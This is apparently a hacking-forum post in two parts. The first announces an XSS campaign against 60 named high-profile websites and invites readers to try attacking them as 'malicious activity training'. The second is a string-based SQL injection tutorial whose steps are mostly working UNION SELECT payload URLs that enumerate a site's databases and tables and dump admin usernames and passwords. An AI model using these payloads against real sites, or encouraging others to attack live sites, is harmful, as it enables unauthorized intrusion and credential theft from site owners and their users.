60 XSS on High profile websites by Zer0Freak [Softpedia]

Operation: Op#Zer0XSS
From member -Zerofreak-, Team Intra
Reason: Educational purposes and malicious activity training
Duration: Less than 30 min

Vulnerabilities: Non-Persistent XSS
http://news.softpedia.com/news/Mancheste...5348.shtml
http://www.ehackingnews.com/2012/02/60-h...o-xss.html

List of Disclosure with screenshots:
http://pastebin.com/Np3LGY6Z

Alright guys, go scroll up my list and see if you can XSS those sites.
I've collected them so that people can be eager to train more and understand the concept of XSS
Don't be bothered reporting anything, cause I've reported all of those sites and I didn't get a single response.

I have the full disclosure right here:
http://screensnapr.com/v/HqEJ3z.png

http://pasteit.com/16958
 

String Based SQL injection

Tutorial by Zer0Freak
Difficulty: Easy
Requirements: 10 minutes of reading time, patience and intuition
Previous Chapters:
Chapter1: http://www.hackforums.net/showthread.php?tid=2059771
Chapter2: http://www.hackforums.net/showthread.php?tid=2060211
Chapter3: http://www.hackforums.net/showthread.php?tid=2061628
Chapter4: http://www.hackforums.net/showthread.php?tid=2085773

Alright, since my previous tutorials haven't had enough responses as I expected due to people who aren't fond of reading big tutorials, I've decided I won't make this tutorial big. As a matter of fact, I'll just make you understand the concepts behind String Based SQL injection. I KNOW there are a lot of tutorials that would be the same as this one, but I guarantee that if you read this, you won't have any doubts on String Based.




What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)



Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based




This will be considered as a mini tutorial for String Based SQL injection. I just hope people are gonna understand this as much as they're on their journey through SQL injection
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi
End of Chapter 5
Upcoming Chapter: Blind Based SQL Injection Detailed
Contact me via PM
or
Email: zerofreak@live.com
Have a great day